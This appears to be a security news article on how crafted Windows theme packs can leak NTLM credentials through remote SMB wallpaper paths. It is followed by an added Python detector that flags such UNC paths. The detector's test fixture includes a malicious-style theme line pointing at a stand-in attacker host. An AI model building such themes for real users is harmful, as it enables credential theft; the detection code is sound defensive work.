Specially crafted Windows 10 themes and theme packs can be used in ‘Pass-the-Hash’ attacks to steal Windows account credentials from unsuspecting users. Windows allows users to create custom themes that define the colors, sounds, mouse cursors, and wallpaper the operating system uses, and users can switch between themes at will to change its appearance. A theme’s settings are saved under the %AppData%\Microsoft\Windows\Themes folder as a file with a .theme extension, such as ‘Custom Dark.theme’. A theme can be shared with other users by right-clicking the active theme and selecting ‘Save theme for sharing’, which packages it into a ‘.deskthemepack’ file. These desktop theme packs can then be distributed by email or as website downloads, and are installed simply by double-clicking them.
This weekend, security researcher Jimmy Bayne (@bohops) revealed that specially crafted Windows themes could be used to perform Pass-the-Hash attacks. Pass-the-Hash attacks steal Windows login names and password hashes by tricking a user into accessing a remote SMB share that requires authentication. When trying to access the remote resource, Windows automatically attempts to log in to the remote system by sending the Windows user’s login name and an NTLM hash of their password. In a Pass-the-Hash attack, the attackers harvest these sent credentials and then attempt to crack the hash to recover the user’s password.
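As an added defensive check, not part of the original article or of Bayne’s research, the Python below parses a .theme file (an INI-format file) and flags any value that is a UNC path to a remote host, the kind of wallpaper reference that would trigger the outbound SMB authentication described above. The sample themes, host name and share are constructed for the example; the section and key names (Control Panel\Desktop, Wallpaper, and so on) are assumed from the .theme file format rather than taken from the article.

```python
import configparser
import re

# Constructed sample .theme (INI format): the wallpaper points at an SMB
# share instead of a local image. Host and share names are placeholders.
SUSPICIOUS_THEME = r"""[Theme]
DisplayName=Custom Dark
[Control Panel\Desktop]
Wallpaper=\\attacker.example\share\wall.jpg
[Control Panel\Cursors]
Arrow=%SystemRoot%\cursors\aero_arrow.cur
"""

# Constructed theme that only references local files; must not be flagged.
BENIGN_THEME = r"""[Theme]
DisplayName=Local Theme
[Control Panel\Desktop]
Wallpaper=%SystemRoot%\web\wallpaper\Windows\img0.jpg
[VisualStyles]
Path=\\?\C:\Windows\resources\Themes\Aero\Aero.msstyles
"""

# UNC path: \\host\share\... ; "\\?\" and "\\.\" are Win32 device-path
# prefixes for *local* resources, so they are excluded from detection.
UNC_RE = re.compile(r"^\\\\(?![?.]\\)([^\\/]+)[\\/]")

def parse_theme(text):
    """Parse .theme content as INI. Interpolation is off because values
    contain %SystemRoot%-style tokens; key case is preserved."""
    cp = configparser.ConfigParser(interpolation=None, strict=False, delimiters=("=",))
    cp.optionxform = str
    cp.read_string(text)
    return cp

def find_remote_references(text):
    """Return (section, key, host) for every value that is a UNC path;
    applying such a theme makes Windows fetch, and authenticate to, that host."""
    cp = parse_theme(text)
    hits = []
    for section in cp.sections():
        for key, value in cp.items(section):
            m = UNC_RE.match(value.strip())
            if m:
                hits.append((section, key, m.group(1)))
    return hits

if __name__ == "__main__":
    for name, theme in (("suspicious", SUSPICIOUS_THEME), ("benign", BENIGN_THEME)):
        print(name, find_remote_references(theme))
```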